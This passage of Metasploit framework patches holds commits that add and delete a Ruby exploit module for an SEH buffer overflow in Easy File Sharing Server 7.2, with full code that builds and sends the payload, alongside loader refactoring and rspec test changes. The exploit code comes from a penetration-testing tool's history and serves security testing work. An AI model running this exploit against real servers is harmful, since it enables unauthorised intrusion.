20) + sploit << " HTTP/1.0\r\n\r\n" + sock.put(sploit) + print_good("Exploit Sent") + handler + disconnect + end From ac6282e4254d6c7c37db613b231e2ebe54352987 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Fri, 22 Jan 2016 14:19:12 +0100 Subject: [PATCH 211/686] revert value --- lib/msf/core/modules/loader/base.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 13992d27c0..548d3fe7ec 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -24,7 +24,7 @@ class Msf::Modules::Loader::Base Msf::MODULE_POST => 'post' } # This must calculate the first line of the NAMESPACE_MODULE_CONTENT string so that errors are reported correctly - NAMESPACE_MODULE_LINE = __LINE__ + 1 + NAMESPACE_MODULE_LINE = __LINE__ + 4 # By calling module_eval from inside the module definition, the lexical scope is captured and available to the code in # module_content. NAMESPACE_MODULE_CONTENT = <<-EOS From 76a8899d59b4099bda6efce0532ab01e4409d226 Mon Sep 17 00:00:00 2001 From: Starwarsfan2099 Date: Fri, 22 Jan 2016 12:39:44 -0500 Subject: [PATCH 212/686] Delete EasyFileSharing_SEH.rb --- .../windows/ftp/EasyFileSharing_SEH.rb | 63 ------------------- 1 file changed, 63 deletions(-) delete mode 100644 modules/exploits/windows/ftp/EasyFileSharing_SEH.rb diff --git a/modules/exploits/windows/ftp/EasyFileSharing_SEH.rb b/modules/exploits/windows/ftp/EasyFileSharing_SEH.rb deleted file mode 100644 index ea1e0f5224..0000000000 --- a/modules/exploits/windows/ftp/EasyFileSharing_SEH.rb +++ /dev/null @@ -1,63 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = AverageRanking - - include Msf::Exploit::Remote::Ftp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Easy File Sharing FTP Server 7.2 SEH Overflow', - 'Description' => %q{ - This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software. - }, - 'Author' => 'Starwarsfan2099 ', - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://www.exploit-db.com/exploits/39008/' ], - ], - 'Privileged' => true, - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Payload' => - { - 'Space' => 390, - 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows Universal', { 'Ret' => "\x98\x97\x01\x10" } ], - ], - 'DisclosureDate' => 'December 2, 2015', - 'DefaultTarget' => 0)) - end - - def exploit - connect - print_status("Generating Shell Code") - sploit = rand_text_alpha_upper(4061) - sploit << "\xeb\x0A\x90\x90" - sploit << target.ret - sploit << make_nops(19) - sploit << payload.encoded - sploit << make_nops(7) - print_status("Buffer length is: #{4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20}") - sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20) - sploit << " HTTP/1.0\r\n\r\n" - send_cmd(['GET ', sploit], true) - print_good("Exploit Sent") - handler - disconnect - end - -end From 45c88d31897e7cd060a998882cb5962e55e78df4 Mon Sep 17 00:00:00 2001 From: Starwarsfan2099 Date: Fri, 22 Jan 2016 13:04:03 -0500 Subject: [PATCH 213/686] Create easyfilesharing_seh.rb --- .../windows/http/easyfilesharing_seh.rb | 77 +++++++++++++++++++ 1 file changed, 77 insertions(+) create mode 100644 modules/exploits/windows/http/easyfilesharing_seh.rb diff --git a/modules/exploits/windows/http/easyfilesharing_seh.rb b/modules/exploits/windows/http/easyfilesharing_seh.rb new file mode 100644 index 0000000000..0b0df415b2 --- /dev/null +++ b/modules/exploits/windows/http/easyfilesharing_seh.rb @@ -0,0 +1,77 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + Rank = AverageRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Easy File Sharing FTP Server 7.2 SEH Overflow', + 'Description' => %q{ + This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software. + }, + 'Author' => 'Starwarsfan2099 ', + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://www.exploit-db.com/exploits/39008/' ], + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 390, + 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows Universal', { 'Ret' => 0x10019798 } ], + ], + 'DisclosureDate' => 'December 2, 2015', + 'DefaultTarget' => 0)) + end + + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri('/') + }) + if res.to_s.include?('Server: Easy File Sharing Web Server v7.2') + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Unknown + end + end + + def exploit + connect + print_status("Generating Shell Code") + sploit = "GET " + sploit << rand_text_alpha_upper(4061) + print_status("Generating Short jump") + sploit << generate_seh_record(target.ret) + sploit << make_nops(19) + sploit << payload.encoded + sploit << make_nops(7) + print_status("Buffer length is: #{4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20}") + sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20) + sploit << " HTTP/1.0\r\n\r\n" + sock.put(sploit) + print_good("Exploit Sent") + handler + disconnect + end +end From ad93d11868f2727d61aad72cb2c65c7ad496b226 Mon Sep 17 00:00:00 2001 From: Starwarsfan2099 Date: Fri, 22 Jan 2016 13:04:14 -0500 Subject: [PATCH 214/686] Delete easyfilesharing_seh.rb --- .../windows/misc/easyfilesharing_seh.rb | 64 ------------------- 1 file changed, 64 deletions(-) delete mode 100644 modules/exploits/windows/misc/easyfilesharing_seh.rb diff --git a/modules/exploits/windows/misc/easyfilesharing_seh.rb b/modules/exploits/windows/misc/easyfilesharing_seh.rb deleted file mode 100644 index 093ed88665..0000000000 --- a/modules/exploits/windows/misc/easyfilesharing_seh.rb +++ /dev/null @@ -1,64 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - - Rank = AverageRanking - - include Msf::Exploit::Remote::Tcp - include Msf::Exploit::Seh - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Easy File Sharing FTP Server 7.2 SEH Overflow', - 'Description' => %q{ - This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software. - }, - 'Author' => 'Starwarsfan2099 ', - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://www.exploit-db.com/exploits/39008/' ], - ], - 'Privileged' => true, - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Payload' => - { - 'Space' => 390, - 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows Universal', { 'Ret' => 0x10019798 } ], - ], - 'DisclosureDate' => 'December 2, 2015', - 'DefaultTarget' => 0)) - end - - def exploit - connect - print_status("Generating Shell Code") - sploit = "GET " - sploit << rand_text_alpha_upper(4061) - print_status("Generating Short jump") - sploit << generate_seh_record(target.ret) - sploit << make_nops(19) - sploit << payload.encoded - sploit << make_nops(7) - print_status("Buffer length is: #{4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20}") - sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20) - sploit << " HTTP/1.0\r\n\r\n" - sock.put(sploit) - print_good("Exploit Sent") - handler - disconnect - end From 153dbf4e73deb96545e58b4881a6a1d53e345721 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Fri, 22 Jan 2016 23:32:22 +0100 Subject: [PATCH 215/686] fix rspecs --- lib/msf/core/modules/loader/base.rb | 24 -- spec/lib/msf/core/modules/loader/base_spec.rb | 365 ++++-------------- 2 files changed, 79 insertions(+), 310 deletions(-) diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 548d3fe7ec..539593413f 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -619,28 +619,4 @@ class Msf::Modules::Loader::Base self.class.typed_path(type, module_reference_name) end - # Returns whether the metasploit_class is usable on the current system. Defer's to metasploit_class's #is_usable if - # it is defined. - # - # @param [Msf::Module] metasploit_class As returned by {Msf::Modules::Namespace#metasploit_class} - # @return [false] if metasploit_class.is_usable returns false. - # @return [true] if metasploit_class does not respond to is_usable. - # @return [true] if metasploit_class.is_usable returns true. - def usable?(metasploit_class) - # If the module indicates that it is not usable on this system, then we - # will not try to use it. - usable = false - - if metasploit_class.respond_to? :is_usable - begin - usable = metasploit_class.is_usable - rescue => error - elog("Exception caught during is_usable check: #{error}") - end - else - usable = true - end - - usable - end end diff --git a/spec/lib/msf/core/modules/loader/base_spec.rb b/spec/lib/msf/core/modules/loader/base_spec.rb index 1dace00ffb..8037d4ab34 100644 --- a/spec/lib/msf/core/modules/loader/base_spec.rb +++ b/spec/lib/msf/core/modules/loader/base_spec.rb @@ -12,7 +12,7 @@ RSpec.describe Msf::Modules::Loader::Base do let(:malformed_module_content) do <<-EOS - class Metasploit3 + class Metasploit # purposeful typo to check that module path is used in backtrace inclde Exploit::Remote::Tcp end @@ -21,7 +21,7 @@ RSpec.describe Msf::Modules::Loader::Base do let(:module_content) do <<-EOS - class Metasploit3 < Msf::Auxiliary + class Metasploit < Msf::Auxiliary # fully-qualified name is Msf::GoodRanking, so this will failing if lexical scope is not captured Rank = GoodRanking end @@ -223,7 +223,7 @@ RSpec.describe Msf::Modules::Loader::Base do context 'instance methods' do let(:module_manager) do - double('Module Manager', :module_load_error_by_path => {}) + double('Module Manager', :module_load_error_by_path => {}, :module_load_warnings => {}) end subject do @@ -309,7 +309,7 @@ RSpec.describe Msf::Modules::Loader::Base do module Msf module Modules module Mod617578696c696172792f72737065632f6d6f636b - class Metasploit3 < Msf::Auxiliary + class Metasploit < Msf::Auxiliary end end @@ -424,51 +424,12 @@ RSpec.describe Msf::Modules::Loader::Base do allow(error).to receive(:backtrace).and_return(backtrace) end - context 'with version compatibility' do - before(:each) do - expect(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) - end - - it 'should record the load error using the original error' do - expect(subject).to receive(:load_error).with(module_path, error) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - end - - context 'without version compatibility' do - let(:version_compatibility_error) do - Msf::Modules::VersionCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name, - :minimum_api_version => infinity, - :minimum_core_version => infinity - ) - end - - let(:infinity) do - 0.0 / 0.0 - end - - before(:each) do - allow(@namespace_module).to receive( - :version_compatible! - ).with( - module_path, - module_reference_name - ).and_raise( - version_compatibility_error - ) - end - - it 'should record the load error using the Msf::Modules::VersionCompatibilityError' do - expect(subject).to receive(:load_error).with(module_path, version_compatibility_error) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end + it 'should record the load error using the original error' do + expect(subject).to receive(:load_error).with(module_path, error) + expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey end it 'should return false' do - expect(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey end end @@ -479,9 +440,13 @@ RSpec.describe Msf::Modules::Loader::Base do @namespace_module = double('Namespace Module') allow(@namespace_module).to receive(:parent_path=) allow(@namespace_module).to receive(:module_eval_with_lexical_scope).with(module_content, module_path) - - metasploit_class = double('Metasploit Class', :parent => @namespace_module) - allow(@namespace_module).to receive(:metasploit_class!).and_return(metasploit_class) + allow(@namespace_module).to receive(:const_defined?).with('Metasploit3', false).and_return(false) + allow(@namespace_module).to receive(:const_defined?).with('Metasploit4', false).and_return(false) + allow(@namespace_module).to receive(:const_defined?).with('Metasploit', false).and_return(true) + allow(@namespace_module).to receive(:const_get).with('Metasploit3', false).and_return(false) + allow(@namespace_module).to receive(:const_get).with('Metasploit4', false).and_return(false) + allow(@namespace_module).to receive(:const_get).with('Metasploit', false).and_return(true) + allow(@namespace_module).to receive(:module_load_warnings) allow(subject).to receive(:namespace_module_transaction).and_yield(@namespace_module) @@ -489,210 +454,83 @@ RSpec.describe Msf::Modules::Loader::Base do @module_load_error_by_path = {} allow(module_manager).to receive(:module_load_error_by_path).and_return(@module_load_error_by_path) + allow(module_manager).to receive(:on_module_load) + # remove the mocked namespace_module since happy-path/real loading is occurring in this context + allow(subject).to receive(:namespace_module_transaction).and_call_original end - it 'should check for version compatibility' do + it 'should log load information' do + expect(subject).to receive(:ilog).with(/#{module_reference_name}/, 'core', LEV_2) + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy + end + + it 'should delete any pre-existing load errors from module_manager.module_load_error_by_path' do + original_load_error = "Back in my day this module didn't load" + module_manager.module_load_error_by_path[module_path] = original_load_error + + expect(module_manager.module_load_error_by_path[module_path]).to eq original_load_error + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy + expect(module_manager.module_load_error_by_path[module_path]).to be_nil + end + + it 'should return true' do + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy + end + + it 'should call module_manager.on_module_load' do expect(module_manager).to receive(:on_module_load) - - expect(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) - subject.load_module(parent_path, type, module_reference_name) + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy end - context 'without version compatibility' do - let(:version_compatibility_error) do - Msf::Modules::VersionCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name, - :minimum_api_version => infinity, - :minimum_core_version => infinity - ) - end - - let(:infinity) do - 0.0 / 0.0 - end - - before(:each) do - allow(@namespace_module).to receive( - :version_compatible! - ).with( - module_path, - module_reference_name - ).and_raise( - version_compatibility_error - ) - end - - it 'should record the load error' do - expect(subject).to receive(:load_error).with(module_path, version_compatibility_error) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should return false' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should restore the old namespace module' do + context 'with :recalculate_by_type' do + it 'should set the type to be recalculated' do + recalculate_by_type = {} + expect( + subject.load_module( + parent_path, + type, + module_reference_name, + :recalculate_by_type => recalculate_by_type + ) + ).to eq true + expect(recalculate_by_type[type]).to be_truthy end end - context 'with version compatibility' do - before(:each) do - allow(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) + context 'with :count_by_type' do + it 'should set the count to 1 if it does not exist' do + count_by_type = {} - allow(module_manager).to receive(:on_module_load) + expect(count_by_type.has_key?(type)).to be_falsey + expect( + subject.load_module( + parent_path, + type, + module_reference_name, + :count_by_type => count_by_type + ) + ).to eq true + expect(count_by_type[type]).to eq 1 end - context 'without metasploit_class' do - let(:error) do - Msf::Modules::MetasploitClassCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name + it 'should increment the count if it does exist' do + original_count = 1 + count_by_type = { + type => original_count + } + + expect( + subject.load_module( + parent_path, + type, + module_reference_name, + :count_by_type => count_by_type ) - end + ).to eq true - before(:each) do - expect(@namespace_module).to receive(:metasploit_class!).with(module_path, module_reference_name).and_raise(error) - end - - it 'should record load error' do - expect(subject).to receive( - :load_error - ).with( - module_path, - kind_of(Msf::Modules::MetasploitClassCompatibilityError) - ) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should return false' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should restore the old namespace module' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - expect(Msf::Modules.const_defined?(relative_name)).to be_truthy - expect(Msf::Modules.const_get(relative_name)).to eq @original_namespace_module - end - end - - context 'with metasploit_class' do - let(:metasploit_class) do - double('Metasploit Class') - end - - before(:each) do - allow(@namespace_module).to receive(:metasploit_class!).and_return(metasploit_class) - end - - it 'should check if it is usable' do - expect(subject).to receive(:usable?).with(metasploit_class).and_return(true) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - context 'without usable metasploit_class' do - before(:each) do - expect(subject).to receive(:usable?).and_return(false) - end - - it 'should log information' do - expect(subject).to receive(:ilog).with(/#{module_reference_name}/, 'core', LEV_1) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should return false' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should restore the old namespace module' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - expect(Msf::Modules.const_defined?(relative_name)).to be_truthy - expect(Msf::Modules.const_get(relative_name)).to eq @original_namespace_module - end - end - - context 'with usable metasploit_class' do - before(:each) do - # remove the mocked namespace_module since happy-path/real loading is occurring in this context - allow(subject).to receive(:namespace_module_transaction).and_call_original - end - - it 'should log load information' do - expect(subject).to receive(:ilog).with(/#{module_reference_name}/, 'core', LEV_2) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - it 'should delete any pre-existing load errors from module_manager.module_load_error_by_path' do - original_load_error = "Back in my day this module didn't load" - module_manager.module_load_error_by_path[module_path] = original_load_error - - expect(module_manager.module_load_error_by_path[module_path]).to eq original_load_error - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - expect(module_manager.module_load_error_by_path[module_path]).to be_nil - end - - it 'should return true' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - it 'should call module_manager.on_module_load' do - expect(module_manager).to receive(:on_module_load) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - context 'with :recalculate_by_type' do - it 'should set the type to be recalculated' do - recalculate_by_type = {} - - expect( - subject.load_module( - parent_path, - type, - module_reference_name, - :recalculate_by_type => recalculate_by_type - ) - ).to eq true - expect(recalculate_by_type[type]).to be_truthy - end - end - - context 'with :count_by_type' do - it 'should set the count to 1 if it does not exist' do - count_by_type = {} - - expect(count_by_type.has_key?(type)).to be_falsey - expect( - subject.load_module( - parent_path, - type, - module_reference_name, - :count_by_type => count_by_type - ) - ).to eq true - expect(count_by_type[type]).to eq 1 - end - - it 'should increment the count if it does exist' do - original_count = 1 - count_by_type = { - type => original_count - } - - expect( - subject.load_module( - parent_path, - type, - module_reference_name, - :count_by_type => count_by_type - ) - ).to eq true - - incremented_count = original_count + 1 - expect(count_by_type[type]).to eq incremented_count - end - end - end + incremented_count = original_count + 1 + expect(count_by_type[type]).to eq incremented_count end end end @@ -944,7 +782,7 @@ RSpec.describe Msf::Modules::Loader::Base do module Msf module Modules module Mod617578696c696172792f72737065632f6d6f636b - class Metasploit3 + class Metasploit end end @@ -1239,7 +1077,7 @@ RSpec.describe Msf::Modules::Loader::Base do module Msf module Modules module Mod0 - class Metasploit3 + class Metasploit end end @@ -1339,50 +1177,5 @@ RSpec.describe Msf::Modules::Loader::Base do subject.send(:typed_path, type, module_reference_name) end end - - context '#usable?' do - context 'without metasploit_class responding to is_usable' do - it 'should return true' do - metasploit_class = double('Metasploit Class') - expect(metasploit_class).not_to respond_to(:is_usable) - - expect(subject.send(:usable?, metasploit_class)).to be_truthy - end - end - - context 'with metasploit_class responding to is_usable' do - it 'should delegate to metasploit_class.is_usable' do - # not a proper return, but guarantees that delegation is actually happening - usability = 'maybe' - metasploit_class = double('Metasploit Class', :is_usable => usability) - - expect(subject.send(:usable?, metasploit_class)).to eq usability - end - - context 'with error from metasploit_class.is_usable' do - let(:error) do - 'Expected error' - end - - let(:metasploit_class) do - metasploit_class = double('Metasploit Class') - - expect(metasploit_class).to receive(:is_usable).and_raise(error) - - metasploit_class - end - - it 'should log error' do - expect(subject).to receive(:elog).with(/#{error}/) - - subject.send(:usable?, metasploit_class) - end - - it 'should return false' do - expect(subject.send(:usable?, metasploit_class)).to be_falsey - end - end - end - end end end From 51eb79adc72a01b791aa52b3fc14048c9fd85e21 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Mon, 28 Dec 2015 21:26:10 +0100 Subject: [PATCH 216/686] first try in changing class names --- lib/msf/core/exploit/ftpserver.rb | 2 +- lib/msf/core/exploit/smb/server/share.rb | 4 +- lib/msf/core/module_manager/loading.rb | 2 +- lib/msf/core/modules/loader/base.rb | 59 ++++---------- .../metasploit_class_compatibility_error.rb | 14 ---- lib/msf/core/modules/namespace.rb | 76 ------------------- .../modules/version_compatibility_error.rb | 52 ------------- .../multi/http/joomla_http_header_rce.rb | 2 +- 8 files changed, 21 insertions(+), 190 deletions(-) delete mode 100644 lib/msf/core/modules/metasploit_class_compatibility_error.rb delete mode 100644 lib/msf/core/modules/namespace.rb delete mode 100644 lib/msf/core/modules/version_compatibility_error.rb diff --git a/lib/msf/core/exploit/ftpserver.rb b/lib/msf/core/exploit/ftpserver.rb index 41dea0f789..e1990f69ad 100644 --- a/lib/msf/core/exploit/ftpserver.rb +++ b/lib/msf/core/exploit/ftpserver.rb @@ -56,7 +56,7 @@ module Exploit::Remote::FtpServer # exists for the given command, returns a generic default response. # # @example Handle SYST requests - # class Metasploit4 < Msf::Exploit + # class Metasploit < Msf::Exploit # include Msf::Exploit::Remote::FtpServer # ... # def on_client_command_syst(cmd_conn, arg) diff --git a/lib/msf/core/exploit/smb/server/share.rb b/lib/msf/core/exploit/smb/server/share.rb index 1ddbdd4172..aaf949ef3b 100644 --- a/lib/msf/core/exploit/smb/server/share.rb +++ b/lib/msf/core/exploit/smb/server/share.rb @@ -17,7 +17,7 @@ module Msf # @example Use it from an Auxiliary module # require 'msf/core' # - # class Metasploit3 < Msf::Auxiliary + # class Metasploit < Msf::Auxiliary # # include Msf::Exploit::Remote::SMB::Server::Share # @@ -59,7 +59,7 @@ module Msf # @example Use it from an Exploit module # require 'msf/core' # - # class Metasploit3 < Msf::Exploit::Remote + # class Metasploit < Msf::Exploit::Remote # Rank = ExcellentRanking # # include Msf::Exploit::EXE diff --git a/lib/msf/core/module_manager/loading.rb b/lib/msf/core/module_manager/loading.rb index c5900bd15a..415107d82d 100644 --- a/lib/msf/core/module_manager/loading.rb +++ b/lib/msf/core/module_manager/loading.rb @@ -122,4 +122,4 @@ module Msf::ModuleManager::Loading count_by_type end -end \ No newline at end of file +end diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 5f4586efd6..617e449efa 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -3,9 +3,7 @@ # Project # require 'msf/core/modules/loader' -require 'msf/core/modules/namespace' -require 'msf/core/modules/metasploit_class_compatibility_error' -require 'msf/core/modules/version_compatibility_error' +require 'msf/core/modules/error' # Responsible for loading modules for {Msf::ModuleManager}. # @@ -26,13 +24,10 @@ class Msf::Modules::Loader::Base Msf::MODULE_POST => 'post' } # This must calculate the first line of the NAMESPACE_MODULE_CONTENT string so that errors are reported correctly - NAMESPACE_MODULE_LINE = __LINE__ + 4 + NAMESPACE_MODULE_LINE = __LINE__ + 1 # By calling module_eval from inside the module definition, the lexical scope is captured and available to the code in # module_content. NAMESPACE_MODULE_CONTENT = <<-EOS - # ensure the namespace module can respond to checks during loading - extend Msf::Modules::Namespace - class << self # The loader that originally loaded this module # @@ -131,8 +126,6 @@ class Msf::Modules::Loader::Base reload ||= force || file_changed - metasploit_class = nil - module_content = read_module_content(parent_path, type, module_reference_name) if module_content.empty? @@ -140,6 +133,7 @@ class Msf::Modules::Loader::Base return false end + klass = nil try_eval_module = lambda { |namespace_module| # set the parent_path so that the module can be reloaded with #load_module namespace_module.parent_path = parent_path @@ -150,44 +144,21 @@ class Msf::Modules::Loader::Base rescue ::Interrupt raise rescue ::Exception => error - # Hide eval errors when the module version is not compatible - begin - namespace_module.version_compatible!(module_path, module_reference_name) - rescue Msf::Modules::VersionCompatibilityError => version_compatibility_error - load_error(module_path, version_compatibility_error) - else - load_error(module_path, error) - end - - return false - end - - begin - namespace_module.version_compatible!(module_path, module_reference_name) - rescue Msf::Modules::VersionCompatibilityError => version_compatibility_error - load_error(module_path, version_compatibility_error) - - return false - end - - begin - metasploit_class = namespace_module.metasploit_class!(module_path, module_reference_name) - rescue Msf::Modules::MetasploitClassCompatibilityError => error load_error(module_path, error) - return false end - unless usable?(metasploit_class) - ilog( - "Skipping module (#{module_reference_name} from #{module_path}) because is_usable returned false.", - 'core', - LEV_1 - ) - + if namespace_module.const_defined?('Metasploit3') || namespace_module.const_defined?('Metasploit4') + load_error(module_path, Msf::Modules::Error.new({ + :module_path => module_path, + :module_reference_name => module_reference_name, + :causal_message => 'Please change the module class name to Metasploit' + })) return false end + klass = namespace_module.const_get('Metasploit') + if reload ilog("Reloading #{type} module #{module_reference_name}. Ambiguous module warnings are safe to ignore", 'core', LEV_2) else @@ -206,7 +177,7 @@ class Msf::Modules::Loader::Base # Do some processing on the loaded module to get it into the right associations module_manager.on_module_load( - metasploit_class, + klass, type, module_reference_name, { @@ -432,8 +403,10 @@ class Msf::Modules::Loader::Base log_lines << "#{module_path} failed to load due to the following error:" log_lines << error.class.to_s log_lines << error.to_s - log_lines << "Call stack:" - log_lines += error.backtrace + if error.backtrace + log_lines << "Call stack:" + log_lines += error.backtrace + end log_message = log_lines.join("\n") elog(log_message) diff --git a/lib/msf/core/modules/metasploit_class_compatibility_error.rb b/lib/msf/core/modules/metasploit_class_compatibility_error.rb deleted file mode 100644 index ae829392cf..0000000000 --- a/lib/msf/core/modules/metasploit_class_compatibility_error.rb +++ /dev/null @@ -1,14 +0,0 @@ -# -*- coding: binary -*- -require 'msf/core/modules/error' - -# Error raised by {Msf::Modules::Namespace#metasploit_class!} if it cannot the namespace_module does not have a constant -# with {Msf::Framework::Major} or lower as a number after 'Metasploit', which indicates a compatible Msf::Module. -class Msf::Modules::MetasploitClassCompatibilityError < Msf::Modules::Error - def initialize(attributes={}) - super_attributes = { - :causal_message => 'Missing compatible Metasploit class constant', - }.merge(attributes) - - super(super_attributes) - end -end \ No newline at end of file diff --git a/lib/msf/core/modules/namespace.rb b/lib/msf/core/modules/namespace.rb deleted file mode 100644 index fa65f5fa26..0000000000 --- a/lib/msf/core/modules/namespace.rb +++ /dev/null @@ -1,76 +0,0 @@ -# -*- coding: binary -*- -require 'metasploit/framework/api/version' -require 'metasploit/framework/core/version' - -# Concern for behavior that all namespace modules that wrap Msf::Modules must support like version checking and -# grabbing the version specific-Metasploit* class. -module Msf::Modules::Namespace - # Returns the Metasploit(3|2|1) class from the module_evalled content. - # - # @note The module content must be module_evalled into this namespace module before the return of - # {#metasploit_class} is valid. - # - # @return [Msf::Module] if a Metasploit(3|2|1) class exists in this module - # @return [nil] if such as class is not defined. - def metasploit_class - metasploit_class = nil - - ::Msf::Framework::Major.downto(1) do |major| - # Since we really only care about the deepest namespace, we don't - # need to look for parents' constants. However, the "inherit" - # parameter for const_defined? only exists after 1.9. If we ever - # drop 1.8 support, we can save a few cycles here by passing false - # here. - if const_defined?("Metasploit#{major}") - metasploit_class = const_get("Metasploit#{major}") - - break - end - end - - metasploit_class - end - - def metasploit_class!(module_path, module_reference_name) - metasploit_class = self.metasploit_class - - unless metasploit_class - raise Msf::Modules::MetasploitClassCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name - ) - end - - metasploit_class - end - - # Raises an error unless {Msf::Framework::VersionCore} and {Msf::Framework::VersionAPI} meet the minimum required - # versions defined in RequiredVersions in the module content. - # - # @note The module content must be module_evalled into this namespace module using module_eval_with_lexical_scope - # before calling {#version_compatible!} is valid. - # - # @param [String] module_path Path from where the module was read. - # @param [String] module_reference_name The canonical name for the module. - # @raise [Msf::Modules::VersionCompatibilityError] if RequiredVersion[0] > Msf::Framework::VersionCore or - # RequiredVersion[1] > Msf::Framework::VersionApi - # @return [void] - def version_compatible!(module_path, module_reference_name) - if const_defined?(:RequiredVersions) - required_versions = const_get(:RequiredVersions) - minimum_core_version = Gem::Version.new(required_versions[0].to_s) - minimum_api_version = Gem::Version.new(required_versions[1].to_s) - - if (minimum_core_version > Metasploit::Framework::Core::GEM_VERSION || - minimum_api_version > Metasploit::Framework::API::GEM_VERSION) - raise Msf::Modules::VersionCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name, - :minimum_api_version => minimum_api_version, - :minimum_core_version => minimum_core_version - ) - end - end - end -end - diff --git a/lib/msf/core/modules/version_compatibility_error.rb b/lib/msf/core/modules/version_compatibility_error.rb deleted file mode 100644 index fb52be3fc8..0000000000 --- a/lib/msf/core/modules/version_compatibility_error.rb +++ /dev/null @@ -1,52 +0,0 @@ -# -*- coding: binary -*- -require 'msf/core/modules/error' - -# Error raised by {Msf::Modules::Namespace#version_compatible!} on {Msf::Modules::Loader::Base#create_namespace_module} -# if the API or Core version does not meet the minimum requirements defined in the RequiredVersions constant in the -# {Msf::Modules::Loader::Base#read_module_content module content}. -class Msf::Modules::VersionCompatibilityError < Msf::Modules::Error - # @param [Hash{Symbol => Float}] attributes - # @option attributes [Float] :minimum_api_version The minimum {Msf::Framework::VersionAPI} as defined in - # RequiredVersions. - # @option attributes [Float] :minimum_core_version The minimum {Msf::Framework::VersionCore} as defined in - # RequiredVersions. - def 